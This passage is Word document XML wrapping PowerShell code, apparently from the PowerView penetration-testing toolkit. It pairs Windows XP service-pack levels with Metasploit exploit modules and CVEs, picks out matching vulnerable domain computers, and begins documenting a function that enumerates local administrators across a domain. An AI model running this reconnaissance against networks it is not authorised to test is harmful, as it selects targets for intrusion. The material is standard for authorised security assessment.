        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 3","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A279CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 3","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B27A2E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows XP","","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA0AA25" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows XP","","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AC1274" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows XP","","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044CAAC9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows XP","","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C408ECE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="23B327A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # Status user        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0477E6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Write-Verbose "[*] Checking computers for vulnerable OS and SP levels..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65788AAB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5C6CB356" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # ----------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5128D5B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # Setup data table to store vulnerable systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269AACE9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    # ----------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E836AC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="658617A9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # Create data table to house vulnerable server list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64468A8E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $TableVulnComputers = New-Object System.Data.DataTable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013E5377" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableVulnComputers.Columns.Add('ComputerName')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F14A298" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableVulnComputers.Columns.Add('OperatingSystem')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AE7B0F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableVulnComputers.Columns.Add('ServicePack')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B3CB95" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableVulnComputers.Columns.Add('LastLogon')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19960ADE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableVulnComputers.Columns.Add('MsfModule')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2BA451" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableVulnComputers.Columns.Add('CVE')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214B7DB6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="68227120" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # Iterate through each exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5AD9CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $TableExploits | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14626D02" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFCAFE8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ExploitOS = $_.OperatingSystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF52A60" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ExploitSP = $_.ServicePack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E678F92" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ExploitMsf = $_.MsfModule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FBC70D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ExploitCVE = $_.CVE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07103709" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="141C0AAC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # Iterate through each ADS computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D21705" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TableAdsComputers | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C9C694" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D3D23C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $AdsHostname = $_.Hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14354A06" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $AdsOS = $_.OperatingSystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B659654" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $AdsSP = $_.ServicePack                                                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6344FFA9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $AdsLast = $_.LastLogon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6910ECDB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495B6E11" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # Add exploitable systems to vul computers data table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539A5A37" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if ($AdsOS -like "$ExploitOS*" -and $AdsSP -like "$ExploitSP" ) {                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6383DA3A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                # Add domain computer to data table                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5457D2A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Null = $TableVulnComputers.Rows.Add($AdsHostname,$AdsOS,$AdsSP,$AdsLast,$ExploitMsf,$ExploitCVE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4838A2D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCAD91C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F7CEF4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CB40EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7486BF94" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # Display results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707077CA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $VulnComputer = $TableVulnComputers | Select-Object ComputerName -Unique | Measure-Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B0774C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $VulnComputerCount = $VulnComputer.Count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDD5C46" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3029D614" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if ($VulnComputer.Count -gt 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50067F6D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # Return vulnerable server list order with some hack date casting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24536159" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "[+] Found $VulnComputerCount potentially vulnerable systems!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCA6AA0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TableVulnComputers | Sort-Object { $_.lastlogon -as [datetime]} -Descending</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4969470E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D7B023" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8D1690" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "[-] No vulnerable systems were found."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA78912" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4273FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C68CC3D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2B700865" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="03FEC211" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Invoke-EnumerateLocalAdmin {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F67C291" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA01DF4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA9D4FC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1D5C9BFE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        This function queries the domain for all active machines with</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D92DF4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Get-NetComputer, then for each server it queries the local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC4927B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Administrators with Get-NetLocalGroup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02342BF0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="268652F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Author: @harmj0y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A294066" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        License: BSD 3-Clause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9846CB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4BE0CD5C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3326C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="676275E7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Host array to enumerate, passable on the pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47521D2C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3435FD4C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16431E0F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="27E4E9EF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        File of hostnames/IPs to search.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EF506A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5EECBD23" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerFilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B20BE42" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="722FBBF2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Host filter name to query AD for, wildcards accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4A282E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="33F42A87" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39105143" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="420A5779" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CA9886" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Useful for OU queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7449FECE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="55C11288" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER NoPing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF0C23F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3158D8BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Don't ping each host to ensure it's up before enumerating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387F62DD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0A008577" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510CDD27" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="758D0079" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Delay between enumerating hosts, defaults to 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5823F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="79684D89" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    .PARAMETER Jitter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31737150" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="34CEDD4F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Jitter for the host delay, defaults to +/- 0.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0CF1F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2EABA1DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER OutFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096D9559" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4C0726B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Output results to a specified csv output file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4963FFFC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1C603C6B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER NoClobber</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FA8E7E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="51394566" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Don't overwrite any existing output file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D283ACA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2B641DF8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER TrustGroups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADE6A9E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="01ACF9BB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Only return results that are not part of the local machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F5359A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        or the machine's domain. Old Invoke-EnumerateLocalTrustGroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51163767" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C584ED2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D4B76A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainOnly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758D3146" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="44A84D7B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Only return domain (non-local) results  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B135B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="346557C9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE5925D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="382CB32E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain to query for machines, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E2CACC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088ABAD8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2EB5ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="14062D8D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0E35A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="582CAFFD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER SearchForest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45686DD4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="524A2D97" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Search all domains in the forest for target users instead of just</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C3CFF4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        a single domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0D6BCE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
